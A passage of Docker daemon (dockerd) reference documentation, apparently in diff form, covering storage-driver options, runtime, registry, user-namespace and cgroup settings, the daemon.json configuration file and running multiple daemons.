consumption (especially as the number of images grows), as well as +> being incompatible with the use of RPMs. + +The `overlay2` uses the same fast union filesystem but takes advantage of +[additional features](https://lkml.org/lkml/2015/2/11/106) added in Linux +kernel 4.0 to avoid excessive inode consumption. Call `dockerd -s overlay2` +to use it. + +> **Note:** +> Both `overlay` and `overlay2` are currently unsupported on `btrfs` or any +> Copy on Write filesystem and should only be used over `ext4` partitions. + +### Storage driver options + +Particular storage-driver can be configured with options specified with +`--storage-opt` flags. Options for `devicemapper` are prefixed with `dm`, +options for `zfs` start with `zfs` and options for `btrfs` start with `btrfs`. + +#### Devicemapper options + +* `dm.thinpooldev` + + Specifies a custom block storage device to use for the thin pool. + + If using a block device for device mapper storage, it is best to use `lvm` + to create and manage the thin-pool volume. This volume is then handed to Docker + to exclusively create snapshot volumes needed for images and containers. + + Managing the thin-pool outside of Engine makes for the most feature-rich + method of having Docker utilize device mapper thin provisioning as the + backing storage for Docker containers. The highlights of the lvm-based + thin-pool management feature include: automatic or interactive thin-pool + resize support, dynamically changing thin-pool features, automatic thinp + metadata checking when lvm activates the thin-pool, etc. + + As a fallback if no thin pool is provided, loopback files are + created. Loopback is very slow, but can be used without any + pre-configuration of storage. It is strongly recommended that you do + not use loopback in production. Ensure your Engine daemon has a + `--storage-opt dm.thinpooldev` argument provided. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.thinpooldev=/dev/mapper/thin-pool + ``` + +* `dm.basesize` + + Specifies the size to use when creating the base device, which limits the + size of images and containers. The default value is 10G. Note, thin devices + are inherently "sparse", so a 10G device which is mostly empty doesn't use + 10 GB of space on the pool. However, the filesystem will use more space for + the empty case the larger the device is. + + The base device size can be increased at daemon restart which will allow + all future images and containers (based on those new images) to be of the + new base device size. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.basesize=50G + ``` + + This will increase the base device size to 50G. The Docker daemon will throw an + error if existing base device size is larger than 50G. A user can use + this option to expand the base device size however shrinking is not permitted. + + This value affects the system-wide "base" empty filesystem + that may already be initialized and inherited by pulled images. Typically, + a change to this value requires additional steps to take effect: + + ```bash + $ sudo service docker stop + $ sudo rm -rf /var/lib/docker + $ sudo service docker start + ``` + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.basesize=20G + ``` + +* `dm.loopdatasize` + + > **Note**: + > This option configures devicemapper loopback, which should not + > be used in production. + + Specifies the size to use when creating the loopback file for the + "data" device which is used for the thin pool. The default size is + 100G. The file is sparse, so it will not initially take up this + much space. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.loopdatasize=200G + ``` + +* `dm.loopmetadatasize` + + > **Note**: + > This option configures devicemapper loopback, which should not + > be used in production. + + Specifies the size to use when creating the loopback file for the + "metadata" device which is used for the thin pool. The default size + is 2G. The file is sparse, so it will not initially take up + this much space. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.loopmetadatasize=4G + ``` + +* `dm.fs` + + Specifies the filesystem type to use for the base device. The supported + options are "ext4" and "xfs". The default is "xfs" + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.fs=ext4 + ``` + +* `dm.mkfsarg` + + Specifies extra mkfs arguments to be used when creating the base device. + + Example use: + + ```bash + $ sudo dockerd --storage-opt "dm.mkfsarg=-O ^has_journal" + ``` + +* `dm.mountopt` + + Specifies extra mount options used when mounting the thin devices. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.mountopt=nodiscard + ``` + +* `dm.datadev` + + (Deprecated, use `dm.thinpooldev`) + + Specifies a custom blockdevice to use for data for the thin pool. + + If using a block device for device mapper storage, ideally both datadev and + metadatadev should be specified to completely avoid using the loopback + device. + + Example use: + + ```bash + $ sudo dockerd \ + --storage-opt dm.datadev=/dev/sdb1 \ + --storage-opt dm.metadatadev=/dev/sdc1 + ``` + +* `dm.metadatadev` + + (Deprecated, use `dm.thinpooldev`) + + Specifies a custom blockdevice to use for metadata for the thin pool. + + For best performance the metadata should be on a different spindle than the + data, or even better on an SSD. + + If setting up a new metadata pool it is required to be valid. This can be + achieved by zeroing the first 4k to indicate empty metadata, like this: + + ```bash + $ dd if=/dev/zero of=$metadata_dev bs=4096 count=1 + ``` + + Example use: + + ```bash + $ sudo dockerd \ + --storage-opt dm.datadev=/dev/sdb1 \ + --storage-opt dm.metadatadev=/dev/sdc1 + ``` + +* `dm.blocksize` + + Specifies a custom blocksize to use for the thin pool. The default + blocksize is 64K. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.blocksize=512K + ``` + +* `dm.blkdiscard` + + Enables or disables the use of blkdiscard when removing devicemapper + devices. This is enabled by default (only) if using loopback devices and is + required to resparsify the loopback file on image/container removal. + + Disabling this on loopback can lead to *much* faster container removal + times, but will make the space used in `/var/lib/docker` directory not be + returned to the system for other use when containers are removed. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.blkdiscard=false + ``` + +* `dm.override_udev_sync_check` + + Overrides the `udev` synchronization checks between `devicemapper` and `udev`. + `udev` is the device manager for the Linux kernel. + + To view the `udev` sync support of a Docker daemon that is using the + `devicemapper` driver, run: + + ```bash + $ docker info + [...] + Udev Sync Supported: true + [...] + ``` + + When `udev` sync support is `true`, then `devicemapper` and udev can + coordinate the activation and deactivation of devices for containers. + + When `udev` sync support is `false`, a race condition occurs between + the`devicemapper` and `udev` during create and cleanup. The race condition + results in errors and failures. (For information on these failures, see + [docker#4036](https://github.com/docker/docker/issues/4036)) + + To allow the `docker` daemon to start, regardless of `udev` sync not being + supported, set `dm.override_udev_sync_check` to true: + + ```bash + $ sudo dockerd --storage-opt dm.override_udev_sync_check=true + ``` + + When this value is `true`, the `devicemapper` continues and simply warns + you the errors are happening. + + > **Note:** + > The ideal is to pursue a `docker` daemon and environment that does + > support synchronizing with `udev`. For further discussion on this + > topic, see [docker#4036](https://github.com/docker/docker/issues/4036). + > Otherwise, set this flag for migrating existing Docker daemons to + > a daemon with a supported environment. + +* `dm.use_deferred_removal` + + Enables use of deferred device removal if `libdm` and the kernel driver + support the mechanism. + + Deferred device removal means that if device is busy when devices are + being removed/deactivated, then a deferred removal is scheduled on + device. And devices automatically go away when last user of the device + exits. + + For example, when a container exits, its associated thin device is removed. + If that device has leaked into some other mount namespace and can't be + removed, the container exit still succeeds and this option causes the + system to schedule the device for deferred removal. It does not wait in a + loop trying to remove a busy device. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.use_deferred_removal=true + ``` + +* `dm.use_deferred_deletion` + + Enables use of deferred device deletion for thin pool devices. By default, + thin pool device deletion is synchronous. Before a container is deleted, + the Docker daemon removes any associated devices. If the storage driver + can not remove a device, the container deletion fails and daemon returns. + + Error deleting container: Error response from daemon: Cannot destroy container + + To avoid this failure, enable both deferred device deletion and deferred + device removal on the daemon. + + ```bash + $ sudo dockerd \ + --storage-opt dm.use_deferred_deletion=true \ + --storage-opt dm.use_deferred_removal=true + ``` + + With these two options enabled, if a device is busy when the driver is + deleting a container, the driver marks the device as deleted. Later, when + the device isn't in use, the driver deletes it. + + In general it should be safe to enable this option by default. It will help + when unintentional leaking of mount point happens across multiple mount + namespaces. + +* `dm.min_free_space` + + Specifies the min free space percent in a thin pool require for new device + creation to succeed. This check applies to both free data space as well + as free metadata space. Valid values are from 0% - 99%. Value 0% disables + free space checking logic. If user does not specify a value for this option, + the Engine uses a default value of 10%. + + Whenever a new a thin pool device is created (during `docker pull` or during + container creation), the Engine checks if the minimum free space is + available. If sufficient space is unavailable, then device creation fails + and any relevant `docker` operation fails. + + To recover from this error, you must create more free space in the thin pool + to recover from the error. You can create free space by deleting some images + and containers from the thin pool. You can also add more storage to the thin + pool. + + To add more space to a LVM (logical volume management) thin pool, just add + more storage to the volume group container thin pool; this should automatically + resolve any errors. If your configuration uses loop devices, then stop the + Engine daemon, grow the size of loop files and restart the daemon to resolve + the issue. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.min_free_space=10% + ``` + +* `dm.xfs_nospace_max_retries` + + Specifies the maximum number of retries XFS should attempt to complete + IO when ENOSPC (no space) error is returned by underlying storage device. + + By default XFS retries infinitely for IO to finish and this can result + in unkillable process. To change this behavior one can set + xfs_nospace_max_retries to say 0 and XFS will not retry IO after getting + ENOSPC and will shutdown filesystem. + + Example use: + + ```bash + $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0 + ``` + +#### ZFS options + +* `zfs.fsname` + + Set zfs filesystem under which docker will create its own datasets. + By default docker will pick up the zfs filesystem where docker graph + (`/var/lib/docker`) is located. + + Example use: + + ```bash + $ sudo dockerd -s zfs --storage-opt zfs.fsname=zroot/docker + ``` + +#### Btrfs options + +* `btrfs.min_space` + + Specifies the minimum size to use when creating the subvolume which is used + for containers. If user uses disk quota for btrfs when creating or running + a container with **--storage-opt size** option, docker should ensure the + **size** cannot be smaller than **btrfs.min_space**. + + Example use: + + ```bash + $ sudo dockerd -s btrfs --storage-opt btrfs.min_space=10G + ``` + +#### Overlay2 options + +* `overlay2.override_kernel_check` + + Overrides the Linux kernel version check allowing overlay2. Support for + specifying multiple lower directories needed by overlay2 was added to the + Linux kernel in 4.0.0. However some older kernel versions may be patched + to add multiple lower directory support for OverlayFS. This option should + only be used after verifying this support exists in the kernel. Applying + this option on a kernel without this support will cause failures on mount. + +## Docker runtime execution options + +The Docker daemon relies on a +[OCI](https://github.com/opencontainers/runtime-spec) compliant runtime +(invoked via the `containerd` daemon) as its interface to the Linux +kernel `namespaces`, `cgroups`, and `SELinux`. + +By default, the Docker daemon automatically starts `containerd`. If you want to +control `containerd` startup, manually start `containerd` and pass the path to +the `containerd` socket using the `--containerd` flag. For example: + +```bash +$ sudo dockerd --containerd /var/run/dev/docker-containerd.sock +``` + +Runtimes can be registered with the daemon either via the +configuration file or using the `--add-runtime` command line argument. + +The following is an example adding 2 runtimes via the configuration: + +```json +{ + "default-runtime": "runc", + "runtimes": { + "runc": { + "path": "runc" + }, + "custom": { + "path": "/usr/local/bin/my-runc-replacement", + "runtimeArgs": [ + "--debug" + ] + } + } +} +``` + +This is the same example via the command line: + +```bash +$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement +``` + +> **Note**: defining runtime arguments via the command line is not supported. + +## Options for the runtime + +You can configure the runtime using options specified +with the `--exec-opt` flag. All the flag's options have the `native` prefix. A +single `native.cgroupdriver` option is available. + +The `native.cgroupdriver` option specifies the management of the container's +cgroups. You can specify only specify `cgroupfs` or `systemd`. If you specify +`systemd` and it is not available, the system errors out. If you omit the +`native.cgroupdriver` option,` cgroupfs` is used. + +This example sets the `cgroupdriver` to `systemd`: + +```bash +$ sudo dockerd --exec-opt native.cgroupdriver=systemd +``` + +Setting this option applies to all containers the daemon launches. + +Also Windows Container makes use of `--exec-opt` for special purpose. Docker user +can specify default container isolation technology with this, for example: + +```bash +$ sudo dockerd --exec-opt isolation=hyperv +``` + +Will make `hyperv` the default isolation technology on Windows. If no isolation +value is specified on daemon start, on Windows client, the default is +`hyperv`, and on Windows server, the default is `process`. + +## Daemon DNS options + +To set the DNS server for all Docker containers, use: + +```bash +$ sudo dockerd --dns 8.8.8.8 +``` + + +To set the DNS search domain for all Docker containers, use: + +```bash +$ sudo dockerd --dns-search example.com +``` + + +## Insecure registries + +Docker considers a private registry either secure or insecure. In the rest of +this section, *registry* is used for *private registry*, and `myregistry:5000` +is a placeholder example for a private registry. + +A secure registry uses TLS and a copy of its CA certificate is placed on the +Docker host at `/etc/docker/certs.d/myregistry:5000/ca.crt`. An insecure +registry is either not using TLS (i.e., listening on plain text HTTP), or is +using TLS with a CA certificate not known by the Docker daemon. The latter can +happen when the certificate was not found under +`/etc/docker/certs.d/myregistry:5000/`, or if the certificate verification +failed (i.e., wrong CA). + +By default, Docker assumes all, but local (see local registries below), +registries are secure. Communicating with an insecure registry is not possible +if Docker assumes that registry is secure. In order to communicate with an +insecure registry, the Docker daemon requires `--insecure-registry` in one of +the following two forms: + +* `--insecure-registry myregistry:5000` tells the Docker daemon that + myregistry:5000 should be considered insecure. +* `--insecure-registry 10.1.0.0/16` tells the Docker daemon that all registries + whose domain resolve to an IP address is part of the subnet described by the + CIDR syntax, should be considered insecure. + +The flag can be used multiple times to allow multiple registries to be marked +as insecure. + +If an insecure registry is not marked as insecure, `docker pull`, +`docker push`, and `docker search` will result in an error message prompting +the user to either secure or pass the `--insecure-registry` flag to the Docker +daemon as described above. + +Local registries, whose IP address falls in the 127.0.0.0/8 range, are +automatically marked as insecure as of Docker 1.3.2. It is not recommended to +rely on this, as it may change in the future. + +Enabling `--insecure-registry`, i.e., allowing un-encrypted and/or untrusted +communication, can be useful when running a local registry. However, +because its use creates security vulnerabilities it should ONLY be enabled for +testing purposes. For increased security, users should add their CA to their +system's list of trusted CAs instead of enabling `--insecure-registry`. + +## Legacy Registries + +Enabling `--disable-legacy-registry` forces a docker daemon to only interact with registries which support the V2 protocol. Specifically, the daemon will not attempt `push`, `pull` and `login` to v1 registries. The exception to this is `search` which can still be performed on v1 registries. + +## Running a Docker daemon behind an HTTPS_PROXY + +When running inside a LAN that uses an `HTTPS` proxy, the Docker Hub +certificates will be replaced by the proxy's certificates. These certificates +need to be added to your Docker host's configuration: + +1. Install the `ca-certificates` package for your distribution +2. Ask your network admin for the proxy's CA certificate and append them to + `/etc/pki/tls/certs/ca-bundle.crt` +3. Then start your Docker daemon with `HTTPS_PROXY=http://username:password@proxy:port/ dockerd`. + The `username:` and `password@` are optional - and are only needed if your + proxy is set up to require authentication. + +This will only add the proxy and authentication to the Docker daemon's requests - +your `docker build`s and running containers will need extra configuration to +use the proxy + +## Default Ulimits + +`--default-ulimit` allows you to set the default `ulimit` options to use for +all containers. It takes the same options as `--ulimit` for `docker run`. If +these defaults are not set, `ulimit` settings will be inherited, if not set on +`docker run`, from the Docker daemon. Any `--ulimit` options passed to +`docker run` will overwrite these defaults. + +Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to +set the maximum number of processes available to a user, not to a container. For details +please check the [run](run.md) reference. + +## Nodes discovery + +The `--cluster-advertise` option specifies the `host:port` or `interface:port` +combination that this particular daemon instance should use when advertising +itself to the cluster. The daemon is reached by remote hosts through this value. +If you specify an interface, make sure it includes the IP address of the actual +Docker host. For Engine installation created through `docker-machine`, the +interface is typically `eth1`. + +The daemon uses [libkv](https://github.com/docker/libkv/) to advertise +the node within the cluster. Some key-value backends support mutual +TLS. To configure the client TLS settings used by the daemon can be configured +using the `--cluster-store-opt` flag, specifying the paths to PEM encoded +files. For example: + +```bash +$ sudo dockerd \ + --cluster-advertise 192.168.1.2:2376 \ + --cluster-store etcd://192.168.1.2:2379 \ + --cluster-store-opt kv.cacertfile=/path/to/ca.pem \ + --cluster-store-opt kv.certfile=/path/to/cert.pem \ + --cluster-store-opt kv.keyfile=/path/to/key.pem +``` + +The currently supported cluster store options are: + +* `discovery.heartbeat` + + Specifies the heartbeat timer in seconds which is used by the daemon as a + keepalive mechanism to make sure discovery module treats the node as alive + in the cluster. If not configured, the default value is 20 seconds. + +* `discovery.ttl` + + Specifies the ttl (time-to-live) in seconds which is used by the discovery + module to timeout a node if a valid heartbeat is not received within the + configured ttl value. If not configured, the default value is 60 seconds. + +* `kv.cacertfile` + + Specifies the path to a local file with PEM encoded CA certificates to trust + +* `kv.certfile` + + Specifies the path to a local file with a PEM encoded certificate. This + certificate is used as the client cert for communication with the + Key/Value store. + +* `kv.keyfile` + + Specifies the path to a local file with a PEM encoded private key. This + private key is used as the client key for communication with the + Key/Value store. + +* `kv.path` + + Specifies the path in the Key/Value store. If not configured, the default value is 'docker/nodes'. + +## Access authorization + +Docker's access authorization can be extended by authorization plugins that your +organization can purchase or build themselves. You can install one or more +authorization plugins when you start the Docker `daemon` using the +`--authorization-plugin=PLUGIN_ID` option. + +```bash +$ sudo dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... +``` + +The `PLUGIN_ID` value is either the plugin's name or a path to its specification +file. The plugin's implementation determines whether you can specify a name or +path. Consult with your Docker administrator to get information about the +plugins available to you. + +Once a plugin is installed, requests made to the `daemon` through the command +line or Docker's Engine API are allowed or denied by the plugin. If you have +multiple plugins installed, at least one must allow the request for it to +complete. + +For information about how to create an authorization plugin, see [authorization +plugin](../../extend/plugins_authorization.md) section in the Docker extend section of this documentation. + + +## Daemon user namespace options + +The Linux kernel [user namespace support](http://man7.org/linux/man-pages/man7/user_namespaces.7.html) provides additional security by enabling +a process, and therefore a container, to have a unique range of user and +group IDs which are outside the traditional user and group range utilized by +the host system. Potentially the most important security improvement is that, +by default, container processes running as the `root` user will have expected +administrative privilege (with some restrictions) inside the container but will +effectively be mapped to an unprivileged `uid` on the host. + +When user namespace support is enabled, Docker creates a single daemon-wide mapping +for all containers running on the same engine instance. The mappings will +utilize the existing subordinate user and group ID feature available on all modern +Linux distributions. +The [`/etc/subuid`](http://man7.org/linux/man-pages/man5/subuid.5.html) and +[`/etc/subgid`](http://man7.org/linux/man-pages/man5/subgid.5.html) files will be +read for the user, and optional group, specified to the `--userns-remap` +parameter. If you do not wish to specify your own user and/or group, you can +provide `default` as the value to this flag, and a user will be created on your behalf +and provided subordinate uid and gid ranges. This default user will be named +`dockremap`, and entries will be created for it in `/etc/passwd` and +`/etc/group` using your distro's standard user and group creation tools. + +> **Note**: The single mapping per-daemon restriction is in place for now +> because Docker shares image layers from its local cache across all +> containers running on the engine instance. Since file ownership must be +> the same for all containers sharing the same layer content, the decision +> was made to map the file ownership on `docker pull` to the daemon's user and +> group mappings so that there is no delay for running containers once the +> content is downloaded. This design preserves the same performance for `docker +> pull`, `docker push`, and container startup as users expect with +> user namespaces disabled. + +### Starting the daemon with user namespaces enabled + +To enable user namespace support, start the daemon with the +`--userns-remap` flag, which accepts values in the following formats: + + - uid + - uid:gid + - username + - username:groupname + +If numeric IDs are provided, translation back to valid user or group names +will occur so that the subordinate uid and gid information can be read, given +these resources are name-based, not id-based. If the numeric ID information +provided does not exist as entries in `/etc/passwd` or `/etc/group`, daemon +startup will fail with an error message. + +**Example: starting with default Docker user management:** + +```bash +$ sudo dockerd --userns-remap=default +``` + +When `default` is provided, Docker will create - or find the existing - user and group +named `dockremap`. If the user is created, and the Linux distribution has +appropriate support, the `/etc/subuid` and `/etc/subgid` files will be populated +with a contiguous 65536 length range of subordinate user and group IDs, starting +at an offset based on prior entries in those files. For example, Ubuntu will +create the following range, based on an existing user named `user1` already owning +the first 65536 range: + +```bash +$ cat /etc/subuid +user1:100000:65536 +dockremap:165536:65536 +``` + +If you have a preferred/self-managed user with subordinate ID mappings already +configured, you can provide that username or uid to the `--userns-remap` flag. +If you have a group that doesn't match the username, you may provide the `gid` +or group name as well; otherwise the username will be used as the group name +when querying the system for the subordinate group ID range. + +The output of `docker info` can be used to determine if the daemon is running +with user namespaces enabled or not. If the daemon is configured with user +namespaces, the Security Options entry in the response will list "userns" as +one of the enabled security features. + +### Detailed information on `subuid`/`subgid` ranges + +Given potential advanced use of the subordinate ID ranges by power users, the +following paragraphs define how the Docker daemon currently uses the range entries +found within the subordinate range files. + +The simplest case is that only one contiguous range is defined for the +provided user or group. In this case, Docker will use that entire contiguous +range for the mapping of host uids and gids to the container process. This +means that the first ID in the range will be the remapped root user, and the +IDs above that initial ID will map host ID 1 through the end of the range. + +From the example `/etc/subuid` content shown above, the remapped root +user would be uid 165536. + +If the system administrator has set up multiple ranges for a single user or +group, the Docker daemon will read all the available ranges and use the +following algorithm to create the mapping ranges: + +1. The range segments found for the particular user will be sorted by *start ID* ascending. +2. Map segments will be created from each range in increasing value with a length matching the length of each segment. Therefore the range segment with the lowest numeric starting value will be equal to the remapped root, and continue up through host uid/gid equal to the range segment length. As an example, if the lowest segment starts at ID 1000 and has a length of 100, then a map of 1000 -> 0 (the remapped root) up through 1100 -> 100 will be created from this segment. If the next segment starts at ID 10000, then the next map will start with mapping 10000 -> 101 up to the length of this second segment. This will continue until no more segments are found in the subordinate files for this user. +3. If more than five range segments exist for a single user, only the first five will be utilized, matching the kernel's limitation of only five entries in `/proc/self/uid_map` and `proc/self/gid_map`. + +### Disable user namespace for a container + +If you enable user namespaces on the daemon, all containers are started +with user namespaces enabled. In some situations you might want to disable +this feature for a container, for example, to start a privileged container (see +[user namespace known restrictions](#user-namespace-known-restrictions)). +To enable those advanced features for a specific container use `--userns=host` +in the `run/exec/create` command. +This option will completely disable user namespace mapping for the container's user. + +### User namespace known restrictions + +The following standard Docker features are currently incompatible when +running a Docker daemon with user namespaces enabled: + + - sharing PID or NET namespaces with the host (`--pid=host` or `--net=host`) + - Using `--privileged` mode flag on `docker run` (unless also specifying `--userns=host`) + +In general, user namespaces are an advanced feature and will require +coordination with other capabilities. For example, if volumes are mounted from +the host, file ownership will have to be pre-arranged if the user or +administrator wishes the containers to have expected access to the volume +contents. Note that when using external volume or graph driver plugins, those +external software programs must be made aware of user and group mapping ranges +if they are to work seamlessly with user namespace support. + +Finally, while the `root` user inside a user namespaced container process has +many of the expected admin privileges that go along with being the superuser, the +Linux kernel has restrictions based on internal knowledge that this is a user namespaced +process. The most notable restriction that we are aware of at this time is the +inability to use `mknod`. Permission will be denied for device creation even as +container `root` inside a user namespace. + +## Miscellaneous options + +IP masquerading uses address translation to allow containers without a public +IP to talk to other machines on the Internet. This may interfere with some +network topologies and can be disabled with `--ip-masq=false`. + +Docker supports softlinks for the Docker data directory (`/var/lib/docker`) and +for `/var/lib/docker/tmp`. The `DOCKER_TMPDIR` and the data directory can be +set like this: + + DOCKER_TMPDIR=/mnt/disk2/tmp /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 + # or + export DOCKER_TMPDIR=/mnt/disk2/tmp + /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1 + +## Default cgroup parent + +The `--cgroup-parent` option allows you to set the default cgroup parent +to use for containers. If this option is not set, it defaults to `/docker` for +fs cgroup driver and `system.slice` for systemd cgroup driver. + +If the cgroup has a leading forward slash (`/`), the cgroup is created +under the root cgroup, otherwise the cgroup is created under the daemon +cgroup. + +Assuming the daemon is running in cgroup `daemoncgroup`, +`--cgroup-parent=/foobar` creates a cgroup in +`/sys/fs/cgroup/memory/foobar`, whereas using `--cgroup-parent=foobar` +creates the cgroup in `/sys/fs/cgroup/memory/daemoncgroup/foobar` + +The systemd cgroup driver has different rules for `--cgroup-parent`. Systemd +represents hierarchy by slice and the name of the slice encodes the location in +the tree. So `--cgroup-parent` for systemd cgroups should be a slice name. A +name can consist of a dash-separated series of names, which describes the path +to the slice from the root slice. For example, `--cgroup-parent=user-a-b.slice` +means the memory cgroup for the container is created in +`/sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-.scope`. + +This setting can also be set per container, using the `--cgroup-parent` +option on `docker create` and `docker run`, and takes precedence over +the `--cgroup-parent` option on the daemon. + +## Daemon Metrics + +The `--metrics-addr` option takes a tcp address to serve the metrics API. +This feature is still experimental, therefore, the daemon must be running in experimental +mode for this feature to work. + +To serve the metrics API on localhost:1337 you would specify `--metrics-addr 127.0.0.1:1337` +allowing you to make requests on the API at `127.0.0.1:1337/metrics` to receive metrics in the +[prometheus](https://prometheus.io/docs/instrumenting/exposition_formats/) format. + +If you are running a prometheus server you can add this address to your scrape configs +to have prometheus collect metrics on Docker. For more information +on prometheus you can view the website [here](https://prometheus.io/). + +```yml +scrape_configs: + - job_name: 'docker' + static_configs: + - targets: ['127.0.0.1:1337'] +``` + +Please note that this feature is still marked as experimental as metrics and metric +names could change while this feature is still in experimental. Please provide +feedback on what you would like to see collected in the API. + +## Daemon configuration file + +The `--config-file` option allows you to set any configuration option +for the daemon in a JSON format. This file uses the same flag names as keys, +except for flags that allow several entries, where it uses the plural +of the flag name, e.g., `labels` for the `label` flag. + +The options set in the configuration file must not conflict with options set +via flags. The docker daemon fails to start if an option is duplicated between +the file and the flags, regardless their value. We do this to avoid +silently ignore changes introduced in configuration reloads. +For example, the daemon fails to start if you set daemon labels +in the configuration file and also set daemon labels via the `--label` flag. +Options that are not present in the file are ignored when the daemon starts. + +### Linux configuration file + +The default location of the configuration file on Linux is +`/etc/docker/daemon.json`. The `--config-file` flag can be used to specify a + non-default location. + +This is a full example of the allowed configuration options on Linux: + +```json +{ + "authorization-plugins": [], + "dns": [], + "dns-opts": [], + "dns-search": [], + "exec-opts": [], + "exec-root": "", + "experimental": false, + "storage-driver": "", + "storage-opts": [], + "labels": [], + "live-restore": true, + "log-driver": "", + "log-opts": {}, + "mtu": 0, + "pidfile": "", + "graph": "", + "cluster-store": "", + "cluster-store-opts": {}, + "cluster-advertise": "", + "max-concurrent-downloads": 3, + "max-concurrent-uploads": 5, + "shutdown-timeout": 15, + "debug": true, + "hosts": [], + "log-level": "", + "tls": true, + "tlsverify": true, + "tlscacert": "", + "tlscert": "", + "tlskey": "", + "swarm-default-advertise-addr": "", + "api-cors-header": "", + "selinux-enabled": false, + "userns-remap": "", + "group": "", + "cgroup-parent": "", + "default-ulimits": {}, + "init": false, + "init-path": "/usr/libexec/docker-init", + "ipv6": false, + "iptables": false, + "ip-forward": false, + "ip-masq": false, + "userland-proxy": false, + "userland-proxy-path": "/usr/libexec/docker-proxy", + "ip": "0.0.0.0", + "bridge": "", + "bip": "", + "fixed-cidr": "", + "fixed-cidr-v6": "", + "default-gateway": "", + "default-gateway-v6": "", + "icc": false, + "raw-logs": false, + "registry-mirrors": [], + "seccomp-profile": "", + "insecure-registries": [], + "disable-legacy-registry": false, + "default-runtime": "runc", + "oom-score-adjust": -500, + "runtimes": { + "runc": { + "path": "runc" + }, + "custom": { + "path": "/usr/local/bin/my-runc-replacement", + "runtimeArgs": [ + "--debug" + ] + } + } +} +``` + +### Windows configuration file + +The default location of the configuration file on Windows is + `%programdata%\docker\config\daemon.json`. The `--config-file` flag can be + used to specify a non-default location. + +This is a full example of the allowed configuration options on Windows: + +```json +{ + "authorization-plugins": [], + "dns": [], + "dns-opts": [], + "dns-search": [], + "exec-opts": [], + "experimental": false, + "storage-driver": "", + "storage-opts": [], + "labels": [], + "log-driver": "", + "mtu": 0, + "pidfile": "", + "graph": "", + "cluster-store": "", + "cluster-advertise": "", + "max-concurrent-downloads": 3, + "max-concurrent-uploads": 5, + "shutdown-timeout": 15, + "debug": true, + "hosts": [], + "log-level": "", + "tlsverify": true, + "tlscacert": "", + "tlscert": "", + "tlskey": "", + "swarm-default-advertise-addr": "", + "group": "", + "default-ulimits": {}, + "bridge": "", + "fixed-cidr": "", + "raw-logs": false, + "registry-mirrors": [], + "insecure-registries": [], + "disable-legacy-registry": false +} +``` + +### Configuration reloading + +Some options can be reconfigured when the daemon is running without requiring +to restart the process. We use the `SIGHUP` signal in Linux to reload, and a global event +in Windows with the key `Global\docker-daemon-config-$PID`. The options can +be modified in the configuration file but still will check for conflicts with +the provided flags. The daemon fails to reconfigure itself +if there are conflicts, but it won't stop execution. + +The list of currently supported options that can be reconfigured is this: + +- `debug`: it changes the daemon to debug mode when set to true. +- `cluster-store`: it reloads the discovery store with the new address. +- `cluster-store-opts`: it uses the new options to reload the discovery store. +- `cluster-advertise`: it modifies the address advertised after reloading. +- `labels`: it replaces the daemon labels with a new set of labels. +- `live-restore`: Enables [keeping containers alive during daemon downtime](https://docs.docker.com/engine/admin/live-restore/). +- `max-concurrent-downloads`: it updates the max concurrent downloads for each pull. +- `max-concurrent-uploads`: it updates the max concurrent uploads for each push. +- `default-runtime`: it updates the runtime to be used if not is + specified at container creation. It defaults to "default" which is + the runtime shipped with the official docker packages. +- `runtimes`: it updates the list of available OCI runtimes that can + be used to run containers +- `authorization-plugin`: specifies the authorization plugins to use. +- `insecure-registries`: it replaces the daemon insecure registries with a new set of insecure registries. If some existing insecure registries in daemon's configuration are not in newly reloaded insecure resgitries, these existing ones will be removed from daemon's config. + +Updating and reloading the cluster configurations such as `--cluster-store`, +`--cluster-advertise` and `--cluster-store-opts` will take effect only if +these configurations were not previously configured. If `--cluster-store` +has been provided in flags and `cluster-advertise` not, `cluster-advertise` +can be added in the configuration file without accompanied by `--cluster-store`. +Configuration reload will log a warning message if it detects a change in +previously configured cluster configurations. + + +## Running multiple daemons + +> **Note:** Running multiple daemons on a single host is considered as "experimental". The user should be aware of +> unsolved problems. This solution may not work properly in some cases. Solutions are currently under development +> and will be delivered in the near future. + +This section describes how to run multiple Docker daemons on a single host. To +run multiple daemons, you must configure each daemon so that it does not +conflict with other daemons on the same host. You can set these options either +by providing them as flags, or by using a [daemon configuration file](#daemon-configuration-file). + +The following daemon options must be configured for each daemon: + +```bash +-b, --bridge= Attach containers to a network bridge +--exec-root=/var/run/docker Root of the Docker execdriver +-g, --graph=/var/lib/docker Root of the Docker runtime +-p, --pidfile=/var/run/docker.pid Path to use for daemon PID file +-H, --host=[] Daemon socket(s) to connect to +--iptables=true Enable addition of iptables rules +--config-file=/etc/docker/daemon.json Daemon configuration file +--tlscacert="~/.docker/ca.pem" Trust certs signed only by this CA +--tlscert="~/.docker/cert.pem" Path to TLS certificate file +--tlskey="~/.docker/key.pem" Path to TLS key file +``` + +When your daemons use different values for these flags, you can run them on the same host without any problems. +It is very important to properly understand the meaning of those options and to use them correctly. + +- The `-b, --bridge=` flag is set to `docker0` as default bridge network. It is created automatically when you install Docker. +If you are not using the default, you must create and configure the bridge manually or just set it to 'none': `--bridge=none` +- `--exec-root` is the path where the container state is stored. The default value is `/var/run/docker`. Specify the path for +your running daemon here. +- `--graph` is the path where images are stored. The default value is `/var/lib/docker`. To avoid any conflict with other daemons +set this parameter separately for each daemon. +- `-p, --pidfile=/var/run/docker.pid` is the path where the process ID of the daemon is stored. Specify the path for your +pid file here. +- `--host=[]` specifies where the Docker daemon will listen for client connections. If unspecified, it defaults to 